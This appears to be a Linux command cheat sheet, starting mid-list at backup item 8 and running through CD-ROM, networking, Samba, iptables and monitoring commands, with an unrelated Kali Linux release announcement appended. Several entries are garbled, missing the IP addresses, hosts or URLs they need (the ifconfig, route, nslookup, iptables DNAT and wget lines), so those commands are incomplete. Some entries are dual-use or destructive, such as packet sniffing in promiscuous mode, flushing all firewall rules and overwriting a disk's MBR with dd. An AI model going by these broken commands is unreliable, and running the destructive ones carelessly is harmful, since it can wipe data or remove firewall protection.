8. dd bs=1M if=/dev/hda | gzip | ssh user@ip_addr 'dd of=hda.gz': back up a local hard disk to a remote host via ssh.
9. dd if=/dev/sda of=/tmp/file1: save the contents of a hard drive to a file. (In this case the hard drive is “sda” and the file “file1”).
10. tar -Puf backup.tar /home/user: make an incremental backup of the directory ‘/home/user’.
11. ( cd /tmp/local/ && tar c . ) | ssh -C user@ip_addr 'cd /home/share/ && tar x -p': copy the contents of a directory to a remote directory via ssh.
12. ( tar c /home ) | ssh -C user@ip_addr 'cd /home/backup-home && tar x -p': copy a local directory to a remote directory via ssh.
13. tar cf - . | (cd /tmp/backup ; tar xf - ): local copy from one directory to another, preserving permissions and links.
14. find /home/user1 -name '*.txt' | xargs cp -av --target-directory=/home/backup/ --parents: find all files ending in ‘.txt’ and copy them from one directory to another.
15. find /var/log -name '*.log' | tar cv --files-from=- | bzip2 > log.tar.bz2: find all files ending in ‘.log’ and pack them into a bzip2 archive.
16. dd if=/dev/hda of=/dev/fd0 bs=512 count=1: make a copy of the MBR (Master Boot Record) to a floppy.
17. dd if=/dev/fd0 of=/dev/hda bs=512 count=1: restore the backup of the MBR (Master Boot Record) saved on a floppy.


CD-ROM

1. cdrecord -v gracetime=2 dev=/dev/cdrom -eject blank=fast -force: clean or erase a rewritable CD.
2. mkisofs /dev/cdrom > cd.iso: create an iso image of a cdrom on disk.
3. mkisofs /dev/cdrom | gzip > cd_iso.gz: create a compressed iso image of a cdrom on disk.
4. mkisofs -J -allow-leading-dots -R -V "Label CD" -iso-level 4 -o ./cd.iso data_cd: create an iso image from a directory.
5. cdrecord -v dev=/dev/cdrom cd.iso: burn an iso image.
6. gzip -dc cd_iso.gz | cdrecord dev=/dev/cdrom -: burn a compressed iso image.
7. mount -o loop cd.iso /mnt/iso: mount an iso image.
8. cd-paranoia -B: rip the songs from a CD to wav files.
9. cd-paranoia -- "-3": rip the first 3 songs from a CD to wav files.
10. cdrecord --scanbus: scan the bus to identify the SCSI channel.
11. dd if=/dev/hdc | md5sum: run md5sum on a device such as a CD.

LAN and Wi-Fi

1. ifconfig eth0: show the configuration of an Ethernet network card.
2. ifup eth0: activate an interface ‘eth0’
3. ifdown eth0: disable an interface ‘eth0’
4. ifconfig eth0 netmask set an IP address.
5. ifconfig eth0 promisc: put ‘eth0’ into promiscuous mode to capture packets (sniffing).
6. dhclient eth0: activate interface ‘eth0’ in DHCP mode.
7. route -n: show route table
8. route add -net 0/0 gw IP_Gateway: configure the default gateway.
9. route add -net netmask gw Configure static route to reach network ‘192.168.0.0/16’
10. route del 0/0 gw IP_gateway: remove the static route.
11. echo "1" > /proc/sys/net/ipv4/ip_forward: enable IP routing.
12. hostname: display the system hostname.
13. host hostname search to resolve the name to an IP address (1).
14. nslookup find the host name to resolve the name to an IP address and vice versa (2)
15. ip link show: show the link status of all interfaces.
16. mii-tool eth0: show the link status of ‘eth0’
17. ethtool eth0: display statistics for ‘eth0’.
18. netstat -tup: show all active network connections and their PID.
19. netstat -tupl: show all network services listening on the system and its PID.
20. tcpdump tcp port 80: show all HTTP traffic.
21. iwlist scan: show wireless networks.
22. iwconfig eth1: show the configuration of a wireless network card.
23. whois search Whois database.

Microsoft Windows Networks (SAMBA)

1. nbtscan ip_addr: NetBIOS name resolution.
2. nmblookup -A ip_addr: NetBIOS name resolution.
3. smbclient -L ip_addr/hostname: show the remote shares of a Windows host.


iptables (firewall)

1. iptables -t filter -L: show all chains of the filter table.
2. iptables -t nat -L: show all chains of the nat table.
3. iptables -t filter -F: clear all rules from the filter table.
4. iptables -t nat -F: clear all rules from the nat table.
5. iptables -t filter -X: delete any user-created chain.
6. iptables -t filter -A INPUT -p tcp --dport telnet -j ACCEPT: allow incoming telnet connections.
7. iptables -t filter -A OUTPUT -p tcp --dport http -j DROP: block outgoing HTTP connections.
8. iptables -t filter -A FORWARD -p tcp --dport pop3 -j ACCEPT: allow POP3 connections on the FORWARD chain.
9. iptables -t filter -A INPUT -j LOG --log-prefix "DROP INPUT": log packets on the INPUT chain.
10. iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE: configure PAT (Port Address Translation) on eth0, masquerading outgoing packets.
11. iptables -t nat -A PREROUTING -d -p tcp -m tcp --dport 22 -j DNAT --to-destination redirect packets directed from one host to another.

Monitoring and debugging

1. top: show cpu processes.
2. ps -eafw: show cpu processes.
3. ps -e -o pid,args --forest: show Linux processes in a hierarchical manner.
4. pstree: show system processes tree.
5. kill -9 ID_Process: force a process to close and terminate.
6. kill -1 ID_Process: force a process to reload the configuration.
7. lsof -p $$: display a list of files opened by processes.
8. lsof /home/user1: lists open files on a given path by the system.
9. strace -c ls >/dev/null: show system calls made and received by a process.
10. strace -f -e open ls >/dev/null: display library calls.
11. watch -n1 'cat /proc/interrupts': show interrupts in real time.
12. last reboot: show reboot history.
13. lsmod: display the loaded kernel modules.
14. free -m: display the status of RAM in megabytes.
15. smartctl -A /dev/hda: monitor the reliability of a hard drive via SMART.
16. smartctl -i /dev/hda: check if SMART is enabled on a hard disk.
17. tail /var/log/dmesg: show events from the kernel loading (boot) process.
18. tail /var/log/messages: show system events.

Other useful commands

1. apropos …keyword: display a list of commands related to a program's keywords; useful when you know what your program does but not the command name.
2. man ping: display the on-line manual pages, here for the ping command; use the ‘-k’ option to find any related command.
3. whatis …keyword: display the description of what the program does.
4. mkbootdisk --device /dev/fd0 `uname -r`: create a bootable floppy.
5. gpg -c file1: encrypt a file with GNU Privacy Guard.
6. gpg file1.gpg: decrypt a file with GNU Privacy Guard.
7. wget -r download an entire website.
8. wget -c download a file with the possibility to stop the download and resume later.
9. echo 'wget -c' | at 09:00: start a download at a given time, in this case 9 am.
10. ldd /usr/bin/ssh: display the shared libraries required by ssh.
11. alias hh='history': set an alias for a command: hh = history.
12. chsh: change the command Shell.
13. chsh --list-shells: a useful command to know if you have to remote into another terminal.
14. who -a: show who is logged in, and print the time of the last system boot, dead processes, system login processes, active processes spawned by init, the current runlevel and the last system clock change.


The official update from BackTrack Central:

Seven years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We’ve taken all of this knowledge and experience and implemented it in our “next generation” penetration testing distribution.

After a year of silent development, we are incredibly proud to announce the release and public availability of “Kali Linux”, the most advanced, robust, and stable penetration testing distribution to date.

Kali is a more mature, secure, and enterprise-ready version of BackTrack Linux. Trying to list all the new features and possibilities that are now available in Kali would be an impossible task on this single page. We therefore invite you to visit our new Kali Linux Website and Kali Linux Documentation site to experience the goodness of Kali for yourself.

We are extremely excited about the future of the distribution and we can’t wait to see what the BackTrack community will do with Kali. Sign up in the new Kali Forums and join us in IRC in #kali-linux on and help us usher in this new era.